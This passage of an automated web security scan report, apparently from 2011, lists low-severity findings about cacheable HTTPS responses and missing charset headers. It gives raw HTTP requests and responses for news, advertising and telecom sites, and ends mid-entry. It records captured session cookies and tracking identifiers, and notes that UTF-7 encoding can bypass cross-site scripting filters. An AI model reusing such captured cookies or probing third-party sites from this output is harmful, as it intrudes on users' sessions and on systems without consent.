Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNzI5NjJmMTIwYjA1ZWJkZjRjYTFiZDEyOGJmM2IzZWMiDWxvY2F0aW9uew0iCWNpdHkiElNhbiBGcmFuY2lzY28iC3JhZGl1c2lQIg1sYXRpdHVkZWYaMzcuNzY4MzAwMDAwMDAwMDA0AMInIhNkaXNwbGF5X3N0cmluZyIWU2FuIEZyYW5jaXNjbywgQ0EiDXRpbWV6b25lIg9VUy9QYWNpZmljIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy0xMjIuNDI0MDAwMDAwMDAwMDEAYEIiCnN0YXRlIgdDQQ%3D%3D--b3f37ffc54d0c61cbd071c11a1a76e1ea5894105; path=/; expires=Sun, 04-Dec-2011 01:00:47 GMT; HttpOnly

User-agent: *
Disallow: /javascripts
Disallow: /rss
Disallow: /rss*
Disallow: /ical
Disallow: /ical*
Disallow: /json
Disallow: /json*
Disallow: /partners
Disallow: /partners*
Disallow: /user/
Disallow
...[SNIP]...

27. Cacheable HTTPS response previous next
There are 8 instances of this issue:

https://cdns.gigya.com/gs/SafariIDsProxy.htm
https://maps-api-ssl.google.com/maps
https://observ.subscribeobserver.com/
https://socialize.gigya.com/gs/bookmark.aspx
https://subscriberservices.mcclatchy.com/char/transactiontype.asp
https://www.sprint.net/
https://www.sprint.net/external_videos/pages.php
https://www.sprint.net/index.php

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

27.1. https://cdns.gigya.com/gs/SafariIDsProxy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdns.gigya.com
Path:	/gs/SafariIDsProxy.htm

Request

GET /gs/SafariIDsProxy.htm HTTP/1.1
Host: cdns.gigya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 24 Jul 2011 14:02:54 GMT
ETag: "0bbed61a4acc1:0"
Server: Microsoft-IIS/7.5
X-Server: web501
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 01:22:14 GMT
Content-Length: 4804
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<s
...[SNIP]...

27.2. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

27.3. https://observ.subscribeobserver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://observ.subscribeobserver.com
Path:	/

Request

GET / HTTP/1.1
Host: observ.subscribeobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.4. https://socialize.gigya.com/gs/bookmark.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://socialize.gigya.com
Path:	/gs/bookmark.aspx

Request

GET /gs/bookmark.aspx HTTP/1.1
Host: socialize.gigya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-XSS-Protection: 0
X-AspNet-Version: 2.0.50727
X-Server: web503
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:24:15 GMT
Connection: close
Content-Length: 2076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sharing..
...[SNIP]...

27.5. https://subscriberservices.mcclatchy.com/char/transactiontype.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriberservices.mcclatchy.com
Path:	/char/transactiontype.asp

Request

GET /char/transactiontype.asp HTTP/1.1
Host: subscriberservices.mcclatchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27.6. https://www.sprint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/

Request

Response

27.7. https://www.sprint.net/external_videos/pages.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/external_videos/pages.php

Request

GET /external_videos/pages.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:27:59 GMT
Server: Apache/2.2.4 (Unix)
Content-Length: 2539
Connection: close
Content-Type: text/html

...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>T
...[SNIP]...

27.8. https://www.sprint.net/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/index.php

Request

GET /index.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28. HTML does not specify charset previous next
There are 33 instances of this issue:

http://a.lingospot.com/pv_error/
http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/clk
http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5
http://api.js-kit.com/v1/count
http://c.brightcove.com/services/messagebroker/amf
http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html
https://cdns.gigya.com/gs/SafariIDsProxy.htm
http://content.usatoday.com/asp/uas3/uasSignedOut.htm
http://content.usatoday.com/quickquestion/jquery/1.0.1.html
http://cti.w55c.net/ct/rubicon-cms2.html
http://grfx.cstv.com/schools/nd/data/xml/auctions/m-footbl.xml
http://grfx.cstv.com/schools/nd/graphics/nd-09-bsi-video.jpg
http://grfx.cstv.com/schools/nd/graphics/nd-09-btn-bsi-.gif
http://grfx.cstv.com/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif
http://l1.zedo.com/log/p.html
http://links.industrybrains.com/click
http://nextelonline.nextel.com/tl/set_tl.html
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
http://pbid.pro-market.net/engine
http://pixel.quantserve.com/seg/r
http://premium.mookie1.com/2/nbc.com/ac@Bottom3
http://shop2.sprint.com/assets/olsvideo/mediaPlayer.html
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
https://subscriberservices.mcclatchy.com/char/transactiontype.asp
http://video.od.visiblemeasures.com/log
http://www.charlotteobserver.com/search/
http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html
http://www.newslibrary.com/nlsearch.asp
http://www.reuters.com/resources/r/
http://www.usatoday.com/community/profile.htm
http://www.usatoday.com/marketing/feedback.htm
http://www.usatoday.com/marketing/questions.htm

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

28.1. http://a.lingospot.com/pv_error/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.lingospot.com
Path:	/pv_error/

Request

GET /pv_error/ HTTP/1.1
Host: a.lingospot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:21:06 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: lingo
Content-Length: 345
Connection: Close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Request

GET /j.ad HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

28.3. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sun, 04 Sep 2011 01:21:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

28.4. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/13966-88303-3335-5

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

28.5. http://api.js-kit.com/v1/count previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.js-kit.com
Path:	/v1/count

Request

GET /v1/count HTTP/1.1
Host: api.js-kit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 502 Bad Gateway
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>502 Bad Gateway</h1>
The server returned an invalid or incomplete response.
</body></html>

28.6. http://c.brightcove.com/services/messagebroker/amf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/services/messagebroker/amf

Request

GET /services/messagebroker/amf HTTP/1.1
Host: c.brightcove.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:22:04 GMT
Server:
Content-Length: 27076

<html>
<head>
<title>gobbles!</title>
</head>
<body>
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This tu
...[SNIP]...

28.7. http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c5.zedo.com
Path:	/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

Request

GET /ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html HTTP/1.1
Host: c5.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Last-Modified: Thu, 01 Sep 2011 07:25:45 GMT
Content-Type: text/html
Cache-Control: max-age=2354580
Expires: Sat, 01 Oct 2011 07:25:05 GMT
Date: Sun, 04 Sep 2011 01:22:05 GMT
Content-Length: 1443
Connection: close

<html>
<head><title>Advertisement</title>
<script language='JavaScript'>
var zd_params = new Array();
var zd_params_len = 0;
function zd_getParam(zp_label){
if (zd_params_len < 1){
var zl_qry = '' + w
...[SNIP]...

28.8. https://cdns.gigya.com/gs/SafariIDsProxy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cdns.gigya.com
Path:	/gs/SafariIDsProxy.htm

Request

GET /gs/SafariIDsProxy.htm HTTP/1.1
Host: cdns.gigya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.9. http://content.usatoday.com/asp/uas3/uasSignedOut.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/asp/uas3/uasSignedOut.htm

Request

GET /asp/uas3/uasSignedOut.htm HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:27 GMT
Content-Length: 388

<div class="uasPageElement uasSignedOut">
<span class="uasGreeting">Join USA TODAY  </span>
<span class="uasPageControls">
<a class="uasSignIn" href="#SignIn">Sign in</a>
|
<
...[SNIP]...

28.10. http://content.usatoday.com/quickquestion/jquery/1.0.1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/quickquestion/jquery/1.0.1.html

Request

GET /quickquestion/jquery/1.0.1.html HTTP/1.1
Host: content.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

28.11. http://cti.w55c.net/ct/rubicon-cms2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cti.w55c.net
Path:	/ct/rubicon-cms2.html

Request

GET /ct/rubicon-cms2.html HTTP/1.1
Host: cti.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:01:59 GMT
Expires: Sun, 04 Sep 2011 02:01:59 GMT
Last-Modified: Wed, 03 Aug 2011 19:13:53 GMT
Server: ECS (sjo/5256)
X-Cache: HIT
Content-Length: 2622

<html>
<head>
</head>
<body>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif?ei=RUBICON_MATCH',
...[SNIP]...

28.12. http://grfx.cstv.com/schools/nd/data/xml/auctions/m-footbl.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grfx.cstv.com
Path:	/schools/nd/data/xml/auctions/m-footbl.xml

Request

GET /schools/nd/data/xml/auctions/m-footbl.xml?2726723552 HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://grfx.cstv.com/schools/cbs/store/08_oas_auctionsportal.swf?3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:54:14 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.13. http://grfx.cstv.com/schools/nd/graphics/nd-09-bsi-video.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grfx.cstv.com
Path:	/schools/nd/graphics/nd-09-bsi-video.jpg

Request

GET /schools/nd/graphics/nd-09-bsi-video.jpg HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:45:52 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.14. http://grfx.cstv.com/schools/nd/graphics/nd-09-btn-bsi-.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grfx.cstv.com
Path:	/schools/nd/graphics/nd-09-btn-bsi-.gif

Request

GET /schools/nd/graphics/nd-09-btn-bsi-.gif HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:45:29 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.15. http://grfx.cstv.com/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://grfx.cstv.com
Path:	/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Request

GET /schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:45:30 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.16. http://l1.zedo.com/log/p.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l1.zedo.com
Path:	/log/p.html

Request

GET /log/p.html HTTP/1.1
Host: l1.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "9e27c2b7c1bfe1a0267a93d84e586aa6:1210912694"
Last-Modified: Fri, 16 May 2008 04:38:14 GMT
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:22:48 GMT
Content-Length: 1592
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"


<HTML><BODY>
<SCRIPT LANGUAGE="JavaScript">
var zi2=new Array();var zc2=0;
function zB0(zv1){
if(zc2<1){
var ze2=''+window.locati
...[SNIP]...

28.17. http://links.industrybrains.com/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://links.industrybrains.com
Path:	/click

Request

GET /click HTTP/1.1
Host: links.industrybrains.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Connection: close
Date: Sun, 04 Sep 2011 01:22:48 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 01:22:48 GMT
Content-Length: 77

<html><body>Invalid request</body></html>

28.18. http://nextelonline.nextel.com/tl/set_tl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nextelonline.nextel.com
Path:	/tl/set_tl.html

Request

GET /tl/set_tl.html?105E1B5AD68B10D605E2BDF5FE0A4306 HTTP/1.1
Host: nextelonline.nextel.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 04 Sep 2011 00:45:24 GMT
Content-type: text/html
Content-Length: 1439

<script>
   var cn="TLTSID"; // the cookie name
   var flag="TLisset=true"; // name/value for the "flag" cookie
   // array of domains for different environments (production is last as a catchall)
   // each
...[SNIP]...

28.19. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4462/5032; rdk15=0; ses15=5032^1

Response

28.20. http://pbid.pro-market.net/engine previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pbid.pro-market.net
Path:	/engine

Request

GET /engine HTTP/1.1
Host: pbid.pro-market.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app1.ny
Pragma: no-cache
Cache-Control: no-cache
Expires: Mon, 1 Jan 1990 0:0:0 GMT
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:23:11 GMT
Connection: close

<html><body rightmargin=0 leftmargin=0 topmargin=0 bottommargin=0><H3> Error In Request 833 </H3></body></html>

28.21. http://pixel.quantserve.com/seg/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/seg/r

Request

GET /seg/r HTTP/1.1
Host: pixel.quantserve.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 01:23:21 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.22. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/2/nbc.com/ac@Bottom3

Request

